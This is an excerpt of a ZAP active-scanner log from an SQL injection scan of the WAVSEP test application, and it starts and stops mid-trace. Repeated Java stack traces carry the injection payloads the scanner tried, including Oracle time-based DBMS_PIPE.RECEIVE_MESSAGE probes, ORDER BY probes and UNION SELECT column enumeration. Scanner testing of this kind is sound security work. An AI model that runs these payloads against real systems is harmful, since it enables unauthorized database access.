org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962855 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 8336=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(101)||CHR(68)||CHR(108),5) AND (5359=5359] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 8336=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(101)||CHR(68)||CHR(108),5) AND (5359=5359 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962857 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 1611=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(115)||CHR(78)||CHR(102),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 1611=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(115)||CHR(78)||CHR(102),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962858 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 8156=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(76)||CHR(111)||CHR(115),5) AND ('FEGJ'='FEGJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 8156=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(76)||CHR(111)||CHR(115),5) AND ('FEGJ'='FEGJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962860 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 7235=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(81)||CHR(70)||CHR(90),5) AND 'rNfn'='rNfn] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 7235=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(81)||CHR(70)||CHR(90),5) AND 'rNfn'='rNfn at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962862 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 9887=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(105)||CHR(71)||CHR(105),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 9887=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(105)||CHR(71)||CHR(105),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962863 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 7014=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(67)||CHR(114)||CHR(73),5)-- WfzA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 7014=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(67)||CHR(114)||CHR(73),5)-- WfzA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962864 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962866 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) ORDER BY 6346-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) ORDER BY 6346-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962867 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962868 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962870 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962871 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962872 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 